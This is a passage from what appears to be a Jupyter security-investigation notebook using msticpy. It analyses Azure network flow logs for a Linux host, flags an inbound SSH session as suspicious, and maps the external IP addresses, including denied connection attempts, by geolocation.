15 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
16 2019-02-18 05:59:14 2019-02-18 06:58:55 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 632.0 0.0
17 2019-02-18 06:33:29 2019-02-18 06:33:29 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
18 2019-02-18 06:15:59 2019-02-18 06:50:07 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
19 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
20 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
21 2019-02-18 05:59:00 2019-02-18 06:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
22 2019-02-18 06:33:29 2019-02-18 06:33:29 msticalertslxvm2 10.0.3.4 [91.189.88.162] T http 80.0 O 1.0 0.0
23 2019-02-18 06:32:37 2019-02-18 06:32:38 msticalertslxvm2 10.0.3.4 [91.189.92.41, 91.189.92.38] T https 443.0 O 2.0 0.0
24 2019-02-18 06:32:37 2019-02-18 06:32:38 msticalertslxvm2 10.0.3.4 [91.189.92.41, 91.189.92.38] T https 443.0 O 2.0 0.0
25 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
26 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
27 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
28 2019-02-18 18:59:04 2019-02-18 19:58:45 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 616.0 0.0
29 2019-02-18 19:35:19 2019-02-18 19:35:19 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
30 2019-02-18 19:21:08 2019-02-18 19:55:17 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
31 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
32 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
33 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
34 2019-02-18 18:59:04 2019-02-18 19:59:01 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2347.0 0.0
35 2019-02-18 19:35:19 2019-02-18 19:35:19 msticalertslxvm2 10.0.3.4 [91.189.88.149] T http 80.0 O 1.0 0.0
36 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
37 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
38 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
39 2019-02-18 17:59:04 2019-02-18 18:58:51 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 636.0 0.0
40 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
41 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
42 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
43 2019-02-18 15:59:03 2019-02-18 16:58:49 msticalertslxvm2 10.0.3.4 [13.71.172.128, 40.85.232.64, 13.71.172.130, 13.88.255.115] T https 443.0 O 634.0 0.0
44 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
45 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
46 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
47 2019-02-18 17:59:01 2019-02-18 18:59:00 msticalertslxvm2 10.0.3.4 [20.38.98.164, 168.62.32.212, 52.239.220.32, 52.239.220.64] T https 443.0 O 2349.0 0.0
48 2019-02-18 13:59:01 2019-02-18 14:58:42 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 581.0 0.0
49 2019-02-18 13:59:01 2019-02-18 14:58:42 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 581.0 0.0
... ... ... ... ... ... ... ... ... ... ... ... ... ...
112 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
113 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
114 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
115 2019-02-18 07:59:02 2019-02-18 08:58:58 msticalertslxvm2 10.0.3.4 [138.91.96.148, 52.239.220.32, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
116 2019-02-18 08:33:42 2019-02-18 08:33:42 msticalertslxvm2 10.0.3.4 [91.189.88.161] T http 80.0 O 1.0 0.0
117 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
118 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
119 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
120 2019-02-18 09:59:16 2019-02-18 10:58:58 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 631.0 0.0
121 2019-02-18 10:34:04 2019-02-18 10:34:04 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
122 2019-02-18 10:14:56 2019-02-18 10:49:05 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
123 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
124 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
125 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
126 2019-02-18 09:58:59 2019-02-18 10:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 52.239.220.64, 168.62.33.148, 20.38.98.164] T https 443.0 O 2347.0 0.0
127 2019-02-18 10:34:04 2019-02-18 10:34:04 msticalertslxvm2 10.0.3.4 [91.189.88.152] T http 80.0 O 1.0 0.0
128 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
129 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
130 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
131 2019-02-18 10:59:17 2019-02-18 11:58:39 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 601.0 0.0
132 2019-02-18 11:34:13 2019-02-18 11:34:13 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
133 2019-02-18 11:23:13 2019-02-18 11:57:21 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
134 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
135 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
136 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
137 2019-02-18 10:59:02 2019-02-18 11:58:59 msticalertslxvm2 10.0.3.4 [52.239.220.32, 40.117.48.112, 52.239.220.64, 20.38.98.164] T https 443.0 O 2345.0 0.0
138 2019-02-18 11:34:13 2019-02-18 11:34:13 msticalertslxvm2 10.0.3.4 [91.189.91.23] T http 80.0 O 1.0 0.0
139 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
140 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
141 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
142 2019-02-18 11:58:59 2019-02-18 12:58:41 msticalertslxvm2 10.0.3.4 [13.71.172.130, 13.88.255.115, 40.85.232.64, 13.71.172.128] T https 443.0 O 574.0 0.0
143 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 2.0 0.0
144 2019-02-18 12:31:29 2019-02-18 12:31:29 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 1.0 0.0
145 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
146 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
147 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
148 2019-02-18 11:59:02 2019-02-18 12:58:58 msticalertslxvm2 10.0.3.4 [52.239.220.32, 23.96.64.84, 52.239.220.64, 20.38.98.164] T https 443.0 O 2340.0 0.0
149 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [91.189.91.23, 91.189.88.162] T http 80.0 O 2.0 0.0
150 2019-02-18 12:05:33 2019-02-18 12:34:25 msticalertslxvm2 10.0.3.4 [91.189.91.23, 91.189.88.162] T http 80.0 O 2.0 0.0
151 2019-02-18 16:30:27 2019-02-18 16:30:27 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 1.0 0.0
152 2019-02-18 17:04:35 2019-02-18 17:38:44 msticalertslxvm2 10.0.3.4 [91.189.94.4] U ntp 123.0 O 2.0 0.0
153 2019-02-18 17:35:04 2019-02-18 17:35:04 msticalertslxvm2 10.0.3.4 [52.168.50.79] T http 80.0 O 1.0 0.0
154 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
155 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
156 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
157 2019-02-18 16:58:59 2019-02-18 17:58:58 msticalertslxvm2 10.0.3.4 [20.38.98.164, 52.239.220.32, 52.239.220.64, 13.68.165.64] T https 443.0 O 2346.0 0.0
158 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
159 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
160 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0
161 2019-02-18 15:59:02 2019-02-18 16:58:59 msticalertslxvm2 10.0.3.4 [40.117.48.112, 20.38.98.164, 52.239.220.32, 52.239.220.64] T https 443.0 O 2346.0 0.0

162 rows × 13 columns

Flow Time and Protocol Distribution

In [78]:
import warnings

with warnings.catch_warnings():
    warnings.simplefilter("ignore")
    
    az_net_comms_df['TotalAllowedFlows'] = az_net_comms_df['AllowedOutFlows'] + az_net_comms_df['AllowedInFlows']
    sns.catplot(x="L7Protocol", y="TotalAllowedFlows", col="FlowDirection", data=az_net_comms_df)
    sns.relplot(x="FlowStartTime", y="TotalAllowedFlows", 
                col="FlowDirection", kind="line", 
                hue="L7Protocol", data=az_net_comms_df).set_xticklabels(rotation=50)

Isolated SSH traffic

In [79]:
az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\'')[net_default_cols]
Out[79]:
FlowStartTime FlowEndTime VMName VMIPAddress PublicIPs SrcIP DestIP L4Protocol L7Protocol DestPort FlowDirection AllowedOutFlows AllowedInFlows
93 2019-02-18 15:29:18 2019-02-18 15:29:18 None None 23.97.60.214 10.0.3.4 T ssh 22.0 I 0.0 1.0

Seems suspicious, so Record findings

In [80]:
ext_ip_list = az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\'')['AllExtIPs'].tolist()

for ip in ext_ip_list:
    if not ip:
        continue
    # Check IP is not already in our list of entities
    if ip in [curr_ip.Address for curr_ip in alert_ip_entities]:
        continue
    ip_entity = entity.IpAddress(Address=ip)
    iplocation.lookup_ip(ip_entity=ip_entity)
    
    alert_ip_entities.append(ip_entity)
    
add_observation(Observation(caption='Outlier SSH session on Linux Host.',
                            description='''Plot of in/out flows shows unexpected ssh inbound. 
Ip Address confirmed as logon source for SSH.''',
                            item = az_net_comms_df.query('FlowDirection == \'I\' & L7Protocol == \'ssh\''),
                            link='net_flow_graphs'))

Interactive Flow Timeline

In [81]:
nbdisp.display_timeline(data=az_net_comms_df.query('AllowedOutFlows > 0'),
                         overlay_data=az_net_comms_df.query('AllowedInFlows > 0'),
                         alert=security_alert, title='Network Flows (out=blue, in=green)',
                         time_column='FlowStartTime',
                         source_columns=['FlowType', 'AllExtIPs', 'L7Protocol', 'FlowDirection'],
                         height=300)
Loading BokehJS ...
Alert start time =  2019-02-18 15:29:22
C:\Users\ianhelle\AppData\Local\Continuum\anaconda3\envs\condadev\lib\site-packages\bokeh\core\property\container.py:102: DeprecationWarning:

Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working

Contents

GeoLocation Mapping

In [86]:
ip_locs_in = set()
ip_locs_out = set()
for _, row in az_net_comms_df.iterrows():
    ip = row.AllExtIPs

    if ip in ip_locs_in or ip in ip_locs_out or not ip:
        continue
    ip_entity = entity.IpAddress(Address=ip)
    iplocation.lookup_ip(ip_entity=ip_entity)
    if not ip_entity.Location:
        continue
    ip_entity.AdditionalData['protocol'] = row.L7Protocol
    if row.FlowDirection == 'I':
        ip_locs_in.add(ip_entity)
    else:
        ip_locs_out.add(ip_entity)

flow_map = FoliumMap()
display(HTML('<h3>External IP Addresses communicating with host</h3>'))
display(HTML('Numbered circles indicate multiple items - click to expand'))
display(HTML('Location markers: Blue = outbound, Purple = inbound, Green = Host'))

flow_map.add_ip_cluster(ip_entities=inv_host_entity.public_ips,
                        color='green')
flow_map.add_ip_cluster(ip_entities=ip_locs_out,
                        color='blue')
flow_map.add_ip_cluster(ip_entities=ip_locs_in,
                        color='red')

display(flow_map.folium_map)
display(Markdown('<p style="color:red">Warning: the folium mapping library '
                 'does not display correctly in some browsers.</p><br>'
                 'If you see a blank image please retry with a different browser.'))

External IP Addresses communicating with host

Numbered circles indicate multiple items - click to expand
Location markers: Blue = outbound, Purple = inbound, Green = Host

Warning: the folium mapping library does not display correctly in some browsers.


If you see a blank image please retry with a different browser.

Look at 'Denied' Flows - who's trying to get in from where?

Optional and can take a long time

In [89]:
# Comment this out to run automatically
if True:
    az_ip_where = f'''
    | where (VMIPAddress in ({alert_host_ip_list}) 
            or SrcIP in ({alert_host_ip_list}) 
            or DestIP in ({alert_host_ip_list}) 
            )'''

    az_net_query_byip = az_net_analytics_query.format(where_clause=az_ip_where,
                                                      start = ip_q_times.start,
                                                      end = ip_q_times.end)
    %kql -query az_net_query_byip
    az_net_comms_all_df = _kql_raw_result_.to_dataframe()

    ip_all = set()
    ip_locs_in_allow = set()
    ip_locs_out_allow = set()
    ip_locs_in_deny = set()
    ip_locs_out_deny = set()
    for _, row in az_net_comms_all_df.iterrows():
        if not row.PublicIPs:
            continue
        for ip in row.PublicIPs:
            if ip in ip_all:
                continue
            ip_all.add(ip)
            ip_entity = entity.IpAddress(Address=ip)
            iplocation.lookup_ip(ip_entity=ip_entity)
            if not ip_entity.Location:
                print("No location information for IP: ", ip)
                continue
            ip_entity.AdditionalData['protocol'] = row.L7Protocol
            if row.FlowDirection == 'I':
                if row.AllowedInFlows > 0:
                    ip_locs_in_allow.add(ip_entity)
                elif row.DeniedInFlows > 0:
                    ip_locs_in_deny.add(ip_entity)
            else:
                if row.AllowedOutFlows > 0:
                    ip_locs_out_allow.add(ip_entity)
                elif row.DeniedOutFlows > 0:
                    ip_locs_out_deny.add(ip_entity)

    flow_map = FoliumMap()
    display(HTML('<h3>External IP Addresses Blocked and Allowed communicating with host</h3>'))
    display(HTML('Numbered circles indicate multiple items - click to expand.'))
    display(HTML('Location markers: Blue = outbound, Purple = inbound, Red = in denied, Cyan = out denied.'))

    flow_map.add_ip_cluster(ip_entities=ip_locs_in_allow,
                            color='purple')
    flow_map.add_ip_cluster(ip_entities=ip_locs_out_allow,
                            color='blue')
    flow_map.add_ip_cluster(ip_entities=ip_locs_in_deny,
                            color='red')
    flow_map.add_ip_cluster(ip_entities=ip_locs_out_deny,
                            color='cyan')
    display(flow_map.folium_map)
    
    display(Markdown('<p style="color:red">Warning: the folium mapping library '
                     'does not display correctly in some browsers.</p><br>'
                     'If you see a blank image please retry with a different browser.'))
No location information for IP:  193.32.161.50
No location information for IP:  88.214.26.103
No location information for IP:  81.22.45.116
No location information for IP:  88.214.26.77
No location information for IP:  81.22.45.102
No location information for IP:  88.214.26.38
No location information for IP:  141.98.80.150
No location information for IP:  193.32.160.69
No location information for IP:  194.61.24.198
No location information for IP:  81.22.45.81
No location information for IP:  81.22.45.106

External IP Addresses Blocked and Allowed communicating with host

Numbered circles indicate multiple items - click to expand.
Location markers: Blue = outbound, Purple = inbound, Red = in denied, Cyan = out denied.
e:\src\microsoft\msticpy\msticpy\msticpy\nbtools\foliummap.py:73: RuntimeWarning:

Invalid location information for IP: 194.113.106.162

e:\src\microsoft\msticpy\msticpy\msticpy\nbtools\foliummap.py:73: RuntimeWarning:

Invalid location information for IP: 194.147.32.125